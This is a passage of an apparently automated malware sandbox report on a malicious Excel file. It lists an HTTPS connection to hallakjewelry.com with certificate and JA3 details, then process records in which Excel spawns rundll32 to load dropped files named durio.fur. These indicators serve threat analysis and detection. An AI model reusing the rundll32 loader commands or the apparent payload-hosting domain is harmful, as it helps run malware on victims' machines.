                                                                                                                                                                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                        Jun 29, 2021 18:28:04.221026897 CEST192.185.195.245443192.168.2.449736CN=hallakjewelry.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sat May 15 06:53:35 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021Fri Aug 13 06:53:35 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                        CN=R3, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USFri Sep 04 02:00:00 CEST 2020Mon Sep 15 18:00:00 CEST 2025
                                                                                                                                                                        CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Jan 20 20:14:03 CET 2021Mon Sep 30 20:14:03 CEST 2024

                                                                                                                                                                        Code Manipulations

                                                                                                                                                                        Statistics

                                                                                                                                                                        Behavior

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        System Behavior

                                                                                                                                                                        General

                                                                                                                                                                        Start time:18:27:57
                                                                                                                                                                        Start date:29/06/2021
                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                        Imagebase:0x8d0000
                                                                                                                                                                        File size:27110184 bytes
                                                                                                                                                                        MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        General

                                                                                                                                                                        Start time:18:28:03
                                                                                                                                                                        Start date:29/06/2021
                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:rundll32 ..\durio.fur,DllRegisterServer
                                                                                                                                                                        Imagebase:0x930000
                                                                                                                                                                        File size:61952 bytes
                                                                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        General

                                                                                                                                                                        Start time:18:28:04
                                                                                                                                                                        Start date:29/06/2021
                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:rundll32 ..\durio.fur1,DllRegisterServer
                                                                                                                                                                        Imagebase:0x930000
                                                                                                                                                                        File size:61952 bytes
                                                                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        Disassembly

                                                                                                                                                                        Code Analysis

                                                                                                                                                                        Reset < >